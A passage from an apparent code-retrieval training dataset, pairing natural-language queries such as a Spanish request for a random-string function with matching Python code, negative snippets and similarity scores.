inverse(self):\r\n \r\n Mi=mat4()\r\n d=self.determinant()\r\n for i in range(4):\r\n for j in range(4):\r\n sign=1-((i+j)%2)*2\r\n m3=self._submat(i,j)\r\n Mi[j,i]=sign*m3.determinant()/d\r\n return Mi", "def invert(self, a, b):\n raise NotImplementedError", "def inverse(self, point):\n raise NotImplementedError('The Lie group inverse is not implemented.')", "def inv(self):\n\t\tdeterminant = self.det()\n\t\tif determinant:\n\t\t\treturn self.adj() / determinant\n\t\telse:\n\t\t\traise ValueError(\"Not Invertible\")", "def inverse(self):\n n = self.norm()\n c = self.conj()\n d = 1.0 / (n * n)\n c.scale(d)\n return c", "def complex_inverse(c1,cr):", "def invert_var(self):\n return 1./self.var", "def inverse_modulo_p(a, p):\n prime = p\n \n while a < 0:\n a += prime\n \n y1 = 1\n y2 = 0\n \n while a != 1:\n q = (p // a) % prime\n # use of integer division // speeded algorithm up by huge factor\n \n # save temporary values\n tmp_a = a\n tmp_y2 = y2\n # compute all these simultaneously\n a = (p - (q*a)) % prime\n p = tmp_a\n y2 = y1\n y1 = (tmp_y2 - (q*y1)) % prime\n \n return y1 % prime", "def protrudes((u,v)):\r\n return ((u,v,W), (u,v,S), (u,v-1,W), (u-1,v,S))", "def inv_m(self):\n self.m = -self.m", "def inv(q):\n return q * np.array([-1,-1,-1,1]) / amplitude(q) ** 2", "def __invert__(cls):\n try:\n return cls.__inverse__\n except:\n # TODO: more descriptive\n raise err.VinoError('no inverse class was set')", "def inverse( self ):\r\n\t\treturn fraction( self.denominator, self.numerator )", "def invgeochart(w):\n # u = torch.asin(w[...,2])\n u = torch.acos(w[...,2])\n # v = torch.acos(w[...,0]/torch.cos(u))\n v = torch.atan(w[...,1]/w[...,0])\n return torch.stack((u,v+np.pi))", "def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]:\n return [[1- x for x in reversed(row)] for row in A]", "def inv(self):\n\n self.x, self.y = self.y, self.x\n self._x_, self._y_ = self._y_, self._x_\n self.xfac, self.yfac = 1 / self.yfac, 1 / self.xfac\n self._xfac_, self._yfac_ = 1 / self._yfac_, 1 / self._xfac_\n self._u = 1 / self._u.conj()", "def mod_inverse(a, n):\n \n b = n\n if abs(b) == 0:\n return (1, 0, a)\n\n x1, x2, y1, y2 = 0, 1, 1, 0\n while abs(b) > 0:\n q, r = divmod(a, b)\n x = x2 - q * x1\n y = y2 - q * y1\n a, b, x2, x1, y2, y1 = b, r, x1, x, y1, y\n\n return x2 % n", "def inverse(self):\n data = np.linalg.inv(self._data)\n return self.create(self.rows, self.cols, data)", "def inverse(series):\n\n result = 1 / series\n result.name = 'inv ({})'.format(series.name)\n\n return result", "def modular_inverse(a, mod):\n r_prev, u_prev, v_prev, r, u, v = a, 1, 0, mod, 0, 1\n while r != 0:\n q = r_prev // r\n r_prev, u_prev, v_prev, r, u, v = (\n r,\n u,\n v,\n r_prev - q * r,\n u_prev - q * u,\n v_prev - q * v,\n )\n return u_prev", "def mod_inverse_iterative(a, b):\n x, y, u, v = 0, 1, 1, 0\n while a != 0:\n q = int(b / a)\n r = b % a\n m = x - u * q\n n = y - v * q\n b, a, x, y, u, v = a, r, u, v, m, n\n return b, x, y", "def inverse(num, r):\n if int(num) == 0:\n return 0\n else:\n # Multiply with every number in the field and\n # check if the result is one. Easy Peasy!\n # Todo: Use Extended Euclidean Algo\n # or Logs/Anti-Logs\n for i in range(1, 256):\n if _multiply(num, i, r) == 1:\n return i", "def inverse(self):\n if self.field:\n # 1/(a+b√r) = (a-b√r)/((a+b√r)*(a-b√r)) = (a-b√r) / (a*a-b*b*r)\n d = self.a * self.a - self.b * self.b * self.r\n return Constructible(self.a / d, -self.b / d, self.field)\n else:\n # self is a rational\n return Constructible(1 / self.a)", "def __invert__(self) -> Seq:\n return self.reverse_complement()", "def inverse_transform(self, X, copy=...):\n ...", "def inv(a,b,c,d):\n\tdet = a*d-b*c\n\tm = lambda x: fractions.Fraction(x, det)\n\treturn map(str, map(m, [d, -b, -c, a]))", "def _inverse_lines(self):\n pass", "def inverse (x_ij):\n\n Hij = xyzrph2matrix (x_ij)\n Rji = Hij[0:3, 0:3]\n tij = Hij[0:3,3]\n Rij = Rji.transpose ()\n tji = -Rij.dot (tij)\n Hji = numpy.zeros ((4,4))\n Hji[0:3,0:3] = Rij\n Hji[0:3,3] = tji\n Hji[3,3] = 1\n return matrix2xyzrph (Hji)" ]
[ "0.7260351", "0.7015506", "0.69790083", "0.6911814", "0.6806856", "0.6755985", "0.6703932", "0.67010486", "0.66792345", "0.6677001", "0.6664742", "0.66548175", "0.6640481", "0.65897536", "0.65876037", "0.6559641", "0.6545105", "0.65431285", "0.6482718", "0.64756066", "0.6431034", "0.6425339", "0.6421494", "0.64213645", "0.6406834", "0.6405458", "0.63910156", "0.63891184", "0.63673955", "0.63574374", "0.63457555", "0.63456476", "0.6344105", "0.6336931", "0.6336293", "0.6331496", "0.6323322", "0.62827766", "0.6279394", "0.6270797", "0.6262053", "0.62391675", "0.62363774", "0.6234693", "0.6234693", "0.6234693", "0.6234693", "0.6234693", "0.6233078", "0.62238085", "0.62238085", "0.6223478", "0.6211482", "0.6200659", "0.61968267", "0.618654", "0.6183895", "0.61780775", "0.6164897", "0.61612624", "0.6125591", "0.6119571", "0.6115493", "0.61147815", "0.6076534", "0.6069131", "0.60527307", "0.60458195", "0.60175645", "0.6015168", "0.6010988", "0.5995689", "0.5994747", "0.59802175", "0.5975056", "0.5974407", "0.59743005", "0.59740597", "0.59685826", "0.5954536", "0.59478146", "0.5945289", "0.5944407", "0.59298193", "0.5926211", "0.59197044", "0.5919508", "0.5917468", "0.5902847", "0.5898587", "0.5890714", "0.5887707", "0.5885505", "0.5880958", "0.5873021", "0.587225", "0.586389", "0.5857672", "0.58466494", "0.5842775" ]
0.7615787
0
Devuelve una cadena aleatoria
def randString(largo=1): valores = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' return '' .join(random.choice(valores) for i in range(largo))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def entrada_aluno(matricula):\n cod_curso = entrada_curso()\n print('> Em que ano, mês e dia você entrou na UFC? (YYYY-MM-DD)')\n data_de_ingresso = check.entrada('>>> ', check.data)\n print('> Em que data você vai concluir seu curso? (YYYY-MM-DD)')\n data_de_conclusao = check.entrada('>>> ', check.data)\n\n aluno = database.Aluno(matricula, data_de_conclusao,\n data_de_ingresso, cod_curso)\n return aluno", "def agregar_bolsa(self, letra, cantidad):", "def arroba_letras(cadena, long_palabra, costo_palabra_corta, costo_palabra_larga):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n costo_total = 0\n for i in range(len(palabras)):\n if len(palabras[i]) > long_palabra:#verificio si la longitud de esa palabra cortada es menor a lo previamente establecido\n frase_final += palabras[i][0:long_palabra] + \"@ \" # corto la palabra en la posicion max y agrego un @\n costo_total += costo_palabra_corta\n if palabras[i][-1] == \".\": # veo si en la palabra corta cortada hay un punto y si lo lo borro y reemplazo por un STOP\n frase_final = frase_final.strip() + palabras[i].replace(palabras[i], \" STOP \")\n elif palabras[i][-1] == \".\": # veo si en la palabra larga cortada hay un punto y si lo hay lo borro y lo reemplazo por un STOP\n frase_final = frase_final.strip(\".\") + palabras[i].replace(palabras[i][-1], \" STOP \") \n else:\n frase_final += palabras[i] + \" \"\n costo_total += costo_palabra_larga\n frase_final += \"STOPSTOP\" \n \n return f\"\"\"El telegrama final es: \n{frase_final} \nutilizando {long_palabra} letras maximas por palabra a un costo de ${costo_total} \"\"\"", "def intercambiar_mayusculas_minusculas(cad):\n\n nueva_cad = \"\"\n\n for i in cad:\n if ord(i) < 64 or ord(i) > 122:\n nueva_cad = nueva_cad + i\n elif ord(i) < 97:\n nueva_cad = nueva_cad + chr(ord(i) + 32)\n else:\n nueva_cad = nueva_cad + chr(ord(i) - 32)\n\n print(nueva_cad)\n return nueva_cad", "def nuevaClave( self ) :\r\n liActual = [ columna.clave for columna in self.liColumnas if columna.siFormula ]\r\n numero = 1\r\n while True :\r\n clave = \"CALC_%d\"%numero\r\n if clave not in liActual :\r\n return clave\r\n numero += 1", "def orden_llegada(self, agenda):\n from django.db import connection\n with connection.cursor() as cursor:\n cursor.execute(\"\"\"\n select count(*) cantidad from agendamientos_agenda a\n join agendamientos_agendadetalle d on a.id = d.agenda_id\n where a.fecha = ?\n and medico_id = ?\n and turno_id = ? \"\"\", agenda.fecha, agenda.medico.id, agenda.turno.id)\n orden = cursor.fetchone()\n if not orden:\n orden = 0\n\n print(\"maximo orden \" + orden)\n\n return orden+1 # todo controlar que no sea mayor al máximo por médico", "def run(self):\n self.db.table('materia').insert([\n {\n 'nombre': 'Cálculo Diferencial e Integral',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'calculo-diferencial-e-integral',\n 'numeroUrl': 1891,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Estructuras de Datos',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'estructuras-de-datos',\n 'numeroUrl': 241,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Inglés Técnico 1',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'ingles-tecnico-1',\n 'numeroUrl': 665,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Teoría de la Computación 1',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'teoria-de-la-computacion-1',\n 'numeroUrl': 1865,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Programación Orientada a Objetos',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'programacion-orientada-a-objetos',\n 'numeroUrl': 246,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Ingeniería de Requerimientos',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'ingenieria-de-requerimientos',\n 'numeroUrl': 2006,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Métodos Computacionales para el Cálculo',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'métodos-computacionales-para-el-cálculo',\n 'numeroUrl': 2036,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Teoría de la Computación 2',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'teoría-de-la-computación-2',\n 'numeroUrl': 2013,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Arquitecturas y Organización de Computadoras 1',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'arquitecturas-y-organización-de-computadoras-1',\n 'numeroUrl': 2052,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Programación Concurrente',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'programación-concurrente',\n 'numeroUrl': 2059,\n 'esRecursable': False,\n }\n ])", "def cliquer_sur_unité(self):", "def custo(EstadoRestaUm, resultante):\n return 1", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def agregar_al_atril(self):\n self.atril.append(self.bolsa.tomar_bolsa())", "def archivos_de_texto():\n palabra = \"\" \n palabras_candidatas = [] #lista donde se guardara las palabras candidatas de cada linea\n palabra_cantidad = {} #diccionario con la palabra candidata de clave y las veces que esta repetida en cada texto de valor\n with open(\"Cuentos.txt\",\"r\") as Cuentos: \n for linea_Cuentos in Cuentos: #cada ciclo del for es una linea del texto\n for caracter in linea_Cuentos: #cada ciclo del for es una caracter de la linea \n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter) #se transformas caracteres mayusculas y tildes\n palabra += caracter #cada caracter ira formando la palabra\n if not caracter.isalpha():\n if len(palabra) >= 5: #se analiza que la palabra tenga 5 o mas caracteres\n palabras_candidatas.append(palabra) \n palabra = \"\" #se vacia la palabra ya analizada\n for palabra_en_lista in palabras_candidatas: #se introduce las palabras candidatas a un diccionario\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [1,0,0]\n else:\n palabra_cantidad[palabra_en_lista] = [int(palabra_cantidad[palabra_en_lista][0]) + 1 , 0, 0]\n palabras_candidatas = []\n with open(\"La araña negra - tomo 1.txt\",\"r\") as La_arana_negra:#se repite el mismo proceso con los otros dos textos\n for linea_Cuentos in La_arana_negra:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,1,0]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] , int(palabra_cantidad[palabra_en_lista][1]) + 1, 0]\n palabras_candidatas = [] \n with open(\"Las 1000 Noches y 1 Noche.txt\",\"r\") as muchas_noches: \n for linea_Cuentos in muchas_noches:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,0,1]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] ,palabra_cantidad[palabra_en_lista][1], int(palabra_cantidad[palabra_en_lista][2]) + 1]\n palabras_candidatas = [] \n palabra_cantidad = dict(sorted(palabra_cantidad.items())) #se ordena el diccionario alfabeticamente\n with open(\"palabras.csv\",\"w\") as palabras_csv: # se agrga el diccionario a un arcivo .csv\n for palabra in palabra_cantidad:\n palabras_csv.write(palabra)\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][0]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][1]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][2]))\n palabras_csv.write(\"\\n\")\n return palabra_cantidad", "def gen_azon():\n # Le kell kerdeznunk, hogy milyen ID-k vannak hasznalatban\n conn = get_db()\n try:\n cur = conn.cursor()\n try:\n # Lekerdezzuk az osszes order_id-t\n cur.execute(\"SELECT order_id FROM orders\")\n # Itt taroljuk a jelenlegi legnagyobb order_id-t \n # (annak csak az utolso 6 betujet fogjuk vizsgalni)\n biggestvalue = 0\n # Vegigiteralunk az eredmenytablan, es minden order_id-ra\n # megnezzuk hogy az utolso 6 szamjegye nagyobb e mint a biggestValue.\n # Ha az ID-k kozott lenne 2016/ kezdetu is, nem lesz gond, hiszen a \n # vizsgalat soran nem teszunk kulonbseget a kulonbozo evek kozott, igy \n # az osszes evhez kepest egyedi ID jon letre, melyet 2017-kent regisztralunk majd.\n for order_id in cur:\n actualvalue = int(order_id[-6:])\n if actualvalue > biggestvalue:\n biggestvalue = actualvalue\n # A ciklus vegere a biggestValue a legnagyobb order_id ertekkel lesz egyenlo,\n # igy ezt novelve mar biztos hogy egyedi erteket kapunk\n biggestvalue = biggestvalue + 1\n # Az uj ID ele 2017/-es elotagot teszunk\n order_id = '2017/'+str(biggestValue)\n return jsonify({\"order_id\": order_id})\n finally:\n cur.close()\n finally:\n conn.close()", "def criaColuns():\n\n #Preencher Colunas\n numColunsVaz = 5\n numColuns = 2\n coluns = \"\"\n\n while(numColuns > 0): #preenchendo colunas de linha\n while(numColunsVaz > 0): #preenchendo espacos vazios das colunas de cada linha\n coluns += \" \"\n numColunsVaz -= 1\n\n coluns += \"|\"\n numColunsVaz = 5\n numColuns -= 1\n\n coluns += \" \"\n print(espacamento ,coluns ,espacamento)", "def __cacula_agio(table):\n from m2py.misc.vectorize import column\n\n PV = table[0][-1]\n total = sum(column(table, 1))\n premium = total/PV - 1\n return round(premium, 2)", "def mezclar_bolsa(self):", "def mostraCotxe(self):\n return str(self._l[0])+\" \"+str(self._l[1])+\" \"+str(self._l[2])+\" \"+str(self._l[3])", "def girar_aleatorio(self):\n for i in range(len(self.ativo_horas)):\n self.ativo_horas[i] = randint(0, 1)", "def verElArbol(self):\n ventanaEmergente = Toplevel()\n ventanaEmergente.title(\"Arbol\")\n ventanaEmergente.geometry(\"640x500\")\n tela = Canvas(ventanaEmergente, height=500, width=640, bg = \"snow\")\n\n # Capturo los nodos del arbol\n for i in self.arbol.returnXYDeNodos():\n # Pinto un circulo\n tela.create_oval(i[0], i[1], i[0]+55, i[1]+55)\n # SE pinta la leyenda\n tela.create_text(i[0]+24, i[1]+20, text=str(i[2]))\n\n tela.place(x=0, y=0)", "def solicita_adelanto(self, sistema, operacion, medio_de_almacenamiento):\r\n\r\n primeros_cola_r_a = operacion.recurso.cola[0:operacion.recurso.capacity]\r\n primeros_cola_m_a = medio_de_almacenamiento.cola[0:medio_de_almacenamiento.espacios_de_atencion]\r\n\r\n primeros_cola_r_a_disponen_p_e = \\\r\n all(camion.dispone_producto_espacio_medios_almacenamiento(sistema)\r\n for camion in primeros_cola_r_a)\r\n\r\n primeros_cola_m_a_disponen_p_e = \\\r\n all(camion.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento) # TODO rev. posibles bugs\r\n for camion in primeros_cola_m_a)\r\n\r\n primeros_cola_r_a_entre_primeros_colas_m_a = \\\r\n all(camion.entre_primeros_colas_medios_almacenamiento(sistema)\r\n for camion in primeros_cola_r_a)\r\n\r\n if operacion.nombre == \"Transbordo en sistema mecanizado\":\r\n pass\r\n\r\n elif self.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento):\r\n\r\n if self.nombre == 9:\r\n print primeros_cola_m_a\r\n\r\n if self.entre_primeros_cola_medio_de_almacenamiento(medio_de_almacenamiento) \\\r\n and (not primeros_cola_r_a_disponen_p_e or not primeros_cola_r_a_entre_primeros_colas_m_a):\r\n primeros_cola_r_a[operacion.recurso.count].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Operacion\")\r\n\r\n if self.entre_primeros_cola_recurso(operacion.recurso) and not primeros_cola_m_a_disponen_p_e:\r\n\r\n primeros_cola_m_a[medio_de_almacenamiento.espacios_en_uso].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Almacen\")", "def escolher_posicao_auto(tab, jog, str1):\r\n if not eh_tabuleiro(tab) or not (jog in [-1,1] and type(jog)==int) or not (str1 in ['basico','normal','perfeito'] and type(str1)==str):\r\n raise ValueError('escolher_posicao_auto: algum dos argumentos e invalido') \r\n else:\r\n \r\n #vitoria_1: tabuleiro X inteiro -> posicao\r\n \r\n def vitoria_1(tab,jog):\r\n \"\"\"\r\n vitoria_1 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o jogador tiver duas\r\n das suas pecas em linha e uma posicao livre entao retorna essa posicao livre.\r\n \"\"\"\r\n for i in range(1,4):\r\n win = [(0,jog,jog), (jog,0,jog), (jog,jog,0)]\r\n coluna = obter_coluna(tab, i)\r\n linha = obter_linha(tab, i) \r\n if coluna in win:\r\n return i+3*win.index(coluna)\r\n elif linha in win:\r\n return 3*i-2+win.index(linha) \r\n if i!=3:\r\n diagonal = obter_diagonal(tab, i)\r\n if diagonal in win:\r\n if i==1:\r\n return i+4*win.index(diagonal)\r\n\r\n else:\r\n return 7-2*win.index(diagonal)\r\n \r\n #bloqueio_2: tabuleiro X inteiro -> posicao \r\n \r\n def bloqueio_2(tab,jog):\r\n \"\"\"\r\n bloqueio_2 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o adversario tiver duas\r\n das suas pecas em linha e uma posicao livre entao retorna essa posicao livre.\r\n \"\"\"\r\n jog*=-1\r\n return vitoria_1(tab,jog) \r\n \r\n #bifurcacao_3: tabuleiro X inteiro -> lista de posicoes\r\n \r\n def bifurcacao_3(tab, jog):\r\n \"\"\"\r\n bifurcacao_3 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o jogador tiver duas\r\n linhas/colunas/diagonais que se intersectam, onde cada uma contem uma das\r\n suas pecas entao retorna uma lista com todas as posicoes de intersecao \r\n (criando duas formas de vencer na jogada seguinte).\r\n \"\"\"\r\n pos = []\r\n for i in range(1,4):\r\n for j in range(1,4):\r\n if obter_coluna(tab,i).count(jog)==1 and obter_linha(tab,j).count(jog)==1 and eh_posicao_livre(tab, i+3*j-3):\r\n pos+=[i+3*j-3]\r\n for k in range(1,3):\r\n if k==1:\r\n if obter_coluna(tab,i).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 1+4*(i-1)):\r\n pos+=[1+4*(i-1)]\r\n if obter_linha(tab,j).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 1+4*(i-1)):\r\n pos+=[1+4*(i-1)]\r\n if obter_diagonal(tab,1).count(jog)==1 and obter_diagonal(tab,2).count(jog)==1 and eh_posicao_livre(tab, 5):\r\n pos+=[5]\r\n if k==2:\r\n if obter_coluna(tab,i).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 7-2*(i-1)):\r\n pos+=[7-2*(i-1)]\r\n if obter_linha(tab,j).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 3+2*(i-1)):\r\n pos+=[3+2*(i-1)] \r\n return pos\r\n \r\n #bloqueio_de_bifurcacao_4: tabuleiro X inteiro -> posicao\r\n \r\n def bloqueio_de_bifurcacao_4(tab,jog): \r\n \"\"\"\r\n bloqueio_de_bifurcacao_4 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o adversario tiver apenas uma bifurcacao\r\n entao retorna a posicao de bloqueio dessa bifurcacao, caso contrario, retorna a posicao\r\n em que se cria um dois em linha para forcar o oponente a defender, desde que a defesa nao\r\n resulte na criacao de uma bifurcacao para o oponente.\r\n \"\"\" \r\n if len(bifurcacao_3(tab,-1*jog)) == 1 :\r\n return bifurcacao_3(tab,-1*jog)[0]\r\n else:\r\n for i in range(1,4):\r\n if obter_coluna(tab,i).count(jog)==1:\r\n col = obter_coluna(tab,i)\r\n for j in range(3):\r\n if col[j]==0:\r\n pos1=3*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if obter_linha(tab,i).count(jog)==1:\r\n linha = obter_linha(tab,i)\r\n for j in range(3):\r\n if linha[j]==0:\r\n pos1=j+1+3*(i-1)\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if i < 3 and obter_diagonal(tab,i).count(jog)==1:\r\n diagonal = obter_diagonal(tab,i)\r\n for j in range(3):\r\n if i==1:\r\n if diagonal[j]==0:\r\n pos1=4*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n else:\r\n if diagonal[j]==0:\r\n pos1=7-2*j\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1 \r\n \r\n #centro_5: tabuleiro X inteiro -> posicao\r\n \r\n def centro_5(tab, jog):\r\n \"\"\"\r\n centro_5 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e devolve a posicao\r\n central (5) no caso da mesma estar livre.\r\n \"\"\"\r\n if eh_posicao_livre(tab, 5):\r\n return 5\r\n \r\n #canto_oposto_6: tabuleiro X inteiro -> posicao\r\n \r\n def canto_oposto_6(tab, jog):\r\n \"\"\"\r\n canto_oposto_6 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o adversario estiver num\r\n canto e se o canto diagonalmente oposto for uma posicao livre entao\r\n retorna a posicao desse canto oposto.\r\n \"\"\"\r\n jog*=-1\r\n if obter_linha(tab,1)[0]==jog and eh_posicao_livre(tab,9):\r\n return 9\r\n if obter_linha(tab,1)[2]==jog and eh_posicao_livre(tab,7):\r\n return 7\r\n if obter_linha(tab,3)[0]==jog and eh_posicao_livre(tab,3):\r\n return 3\r\n if obter_linha(tab,3)[2]==jog and eh_posicao_livre(tab,1):\r\n return 1 \r\n \r\n #canto_vazio_7: tabuleiro X inteiro -> posicao\r\n \r\n def canto_vazio_7(tab, jog):\r\n \"\"\"\r\n canto_vazio_7 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se um canto for uma posicao\r\n livre entao devolve a posicao correspondente a esse canto.\r\n \"\"\"\r\n for x in [1,3,7,9]:\r\n if eh_posicao_livre(tab,x):\r\n return x \r\n \r\n #lateral_vazio_8: tabuleiro X inteiro -> posicao\r\n \r\n def lateral_vazio_8(tab, jog):\r\n \"\"\"\r\n lateral_vazio_8 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se uma posicao lateral\r\n (que nem e o centro, nem um canto) for livre, entao retorna a posicao\r\n correspondente a essa posicao lateral.\r\n \"\"\"\r\n for x in [2,4,6,8]:\r\n if eh_posicao_livre(tab,x):\r\n return x \r\n \r\n if str1=='basico':\r\n for i in range(2):\r\n if i==0: res = centro_5(tab, jog)\r\n if i==1: res = canto_vazio_7(tab, jog)\r\n if res!=None:\r\n return res\r\n return lateral_vazio_8(tab, jog) \r\n \r\n \r\n elif str1=='normal':\r\n for i in range(5):\r\n if i==0: res = vitoria_1(tab,jog)\r\n if i==1: res = bloqueio_2(tab,jog)\r\n if i==2: res = centro_5(tab, jog)\r\n if i==3: res = canto_oposto_6(tab, jog)\r\n if i==4: res = canto_vazio_7(tab, jog)\r\n if res!=None:\r\n return res\r\n return lateral_vazio_8(tab, jog)\r\n \r\n \r\n elif str1=='perfeito':\r\n for i in range(7):\r\n if i==0: res = vitoria_1(tab,jog)\r\n if i==1: res = bloqueio_2(tab,jog)\r\n if i==2: \r\n res = bifurcacao_3(tab, jog)\r\n if res!=[]:\r\n res = bifurcacao_3(tab, jog)[0]\r\n else:\r\n res=None\r\n if i==3: \r\n res = bloqueio_de_bifurcacao_4(tab,jog)\r\n if res!=[]:\r\n res = bloqueio_de_bifurcacao_4(tab,jog)\r\n else:\r\n res=None \r\n if i==4: res = centro_5(tab, jog)\r\n if i==5: res = canto_oposto_6(tab, jog)\r\n if i==6: res = canto_vazio_7(tab, jog)\r\n if res!=None:\r\n return res\r\n return lateral_vazio_8(tab, jog)", "def entero(self):\n return int(\"\".join(self.binario), 2)", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def reemplaza_tildes(palabra):", "def obtener_adyacente_aleatorio (self,v):\n return choice(list(self.vertices[v].keys()))", "def comando(accion,_):\r\n return array_comandos", "def cria_carro_ford(self):\n\n self.total_de_carros_ford += 1\n print(\"Carro Ford #\", self.total_de_carros_ford, \" criado\")", "def cambiar_escena(self, escena):\n\t\t# Reemplazo directo\n\t\tself.escena = escena\n\t\t# Reiniciar la ventana con el tamaño de la nueva escena\n\t\tprint(\"Iniciando nuevo contexto OpenGL...\")\n\t\tv_ancho, v_alto = escena.tam\n\t\topciones = OPENGL | DOUBLEBUF\n\t\tif escena.pant_compl:\n\t\t\topciones |= FULLSCREEN\n\t\tpygame.display.set_mode((v_ancho, v_alto), opciones)\n\t\t# Título por defecto de la ventana\n\t\tpygame.display.set_caption(escena.nombre)\n\t\t# Reiniciar OpenGL\n\t\tself.gl_ini(v_ancho, v_alto)\n\t\t# Darle los datos del núcleo a la ventana\n\t\tself.escena.nucleo = self\n\t\tself.escena.eventos = self.mapa_eve\n\t\tglClearColor(*escena.color)\n\t\t# Ejecutar la lógica inicial de la escena\n\t\tprint(\"Iniciando escena...\")\n\t\tself.escena.logica_ini()", "def carregarAluno(self, matricula):\r\n try:\r\n self.__id = int(matricula)\r\n self.cursor.execute(\"SELECT * FROM ALUNO WHERE MATRICULA = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None\r\n except:\r\n return None", "def maketableau(alphabet):\n return TabulaRecta(alphabet, ct=alphabet[::-1], keys=alphabet[::-1])", "def crear_mapa (self, ancho = 40 , largo = 40):\n\n for i in range (largo):\n\n a = \" \"\n b = []\n for z in range (ancho):\n b.append(a)\n kasino.mapa.append(b)\n\n for i in range (1,ancho -1):\n kasino.mapa[0][i]=\"═══\"\n kasino.mapa[largo-1][i]=\"═══\"\n\n for i in 